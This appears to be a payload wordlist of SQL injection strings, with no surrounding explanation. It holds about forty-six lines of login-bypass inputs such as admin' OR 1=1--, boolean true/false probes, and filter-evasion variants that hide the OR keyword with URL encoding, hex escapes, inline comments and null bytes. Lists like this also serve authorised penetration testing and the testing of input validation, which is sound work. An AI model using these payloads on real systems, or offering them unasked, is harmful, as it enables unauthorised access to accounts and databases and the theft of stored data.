1' %4f%52 1=1 --
1' %4f%52 1=1 %23
1' %4fR 1=1 %23
1' AND '1'='1' --
1' AND 1=1 --
1' AND '1'='2' --
1' AND 1=2 --
1' O/**/R 1=1 --
1' OR '1'='1' --
1' OR 1=1 --
1' OR 1=1 %00
1' OR 1=1 %23
1' OR '1'='2' --
1' OR 1=2 --
1' O\x52 1=1 --
1' \x4fR 1=1 --
1' \x4f\x52 1=1 --
admin' #
admin' --
admin'/*
admin' AND '1'='1
admin' AND '1'='2
admin' OR '1'='1
admin' OR '1'='1' #
admin' OR '1'='1' ;--
admin' OR '1'='1'--
admin' OR 1=1 #
admin' OR 1=1--
admin' OR 1=1/*
admin' OR '1'='1'%00
admin' OR '1'='2
' AND '1'='1
' AND '1'='2
" OR 1=1 #
" OR 1=1 --
" OR 1=1/*
") OR ("1"="1
") OR ("1"="1"--
") OR 1=1--
' OR '1'='1
' OR 1=1 #
' OR 1=1 --
' OR 1=1/*
') OR ('1'='1
') OR ('1'='1'--
') OR 1=1--
' OR '1'='2
